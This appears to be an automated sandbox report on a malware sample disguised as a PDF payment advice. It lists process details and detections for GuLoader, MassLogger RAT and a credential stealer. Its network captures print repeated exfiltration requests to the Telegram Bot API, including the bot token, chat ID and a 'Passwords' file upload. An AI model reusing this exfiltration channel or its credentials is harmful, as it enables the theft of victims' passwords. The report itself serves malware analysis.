                                                                                                              2024-12-19 14:29:44 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 38 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":19639,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618584,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              15192.168.2.449871149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 14:29:47 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd22273b608ece
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-19 14:29:47 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 32 32 37 33 62 36 30 38 65 63 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd22273b608eceContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2024-12-19 14:29:47 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 19 Dec 2024 14:29:47 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 542
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2024-12-19 14:29:47 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 38 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":19645,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618587,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              16192.168.2.449881149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 14:29:50 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd2260236899fe
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-19 14:29:50 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 32 36 30 32 33 36 38 39 39 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd2260236899feContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2024-12-19 14:29:51 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 19 Dec 2024 14:29:51 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 542
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2024-12-19 14:29:51 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 39 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":19649,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618591,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              17192.168.2.449890149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 14:29:54 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd22a1af022652
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2024-12-19 14:29:54 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 32 61 31 61 66 30 32 32 36 35 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd22a1af022652Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2024-12-19 14:29:54 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 19 Dec 2024 14:29:54 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 542
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2024-12-19 14:29:54 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 39 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":19653,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618594,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              18192.168.2.449899149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 14:29:57 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd22ee4aefaa03
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2024-12-19 14:29:57 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 32 65 65 34 61 65 66 61 61 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd22ee4aefaa03Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2024-12-19 14:29:58 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 19 Dec 2024 14:29:58 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 542
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2024-12-19 14:29:58 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 39 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":19657,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618598,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              19192.168.2.449911149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 14:30:01 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd23550c9a6659
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-19 14:30:01 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 33 35 35 30 63 39 61 36 36 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd23550c9a6659Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2024-12-19 14:30:02 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 19 Dec 2024 14:30:02 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2024-12-19 14:30:02 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 36 30 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":19661,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618602,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              20192.168.2.449928149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-19 14:30:08 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd2444d970b717
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-19 14:30:08 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 34 34 34 64 39 37 30 62 37 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd2444d970b717Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2024-12-19 14:30:09 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 19 Dec 2024 14:30:09 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 542
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2024-12-19 14:30:09 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 36 30 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":19665,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618609,"document":{"file_n


                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Click to jump to process

                                                                                                              Target ID:0
                                                                                                              Start time:09:28:02
                                                                                                              Start date:19/12/2024
                                                                                                              Path:C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:460'983 bytes
                                                                                                              MD5 hash:D0074EDAB5CEE4B432BF2E9F075E6301
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2073192363.0000000003E37000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:4
                                                                                                              Start time:09:28:36
                                                                                                              Start date:19/12/2024
                                                                                                              Path:C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:460'983 bytes
                                                                                                              MD5 hash:D0074EDAB5CEE4B432BF2E9F075E6301
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000004.00000002.3021658495.0000000034D6A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3021658495.0000000034D6A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3021658495.0000000034D6A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2998753015.0000000002C17000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:false

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:21.2%
                                                                                                                Dynamic/Decrypted Code Coverage:13.9%
                                                                                                                Signature Coverage:20.8%
                                                                                                                Total number of Nodes:1517
                                                                                                                Total number of Limit Nodes:46
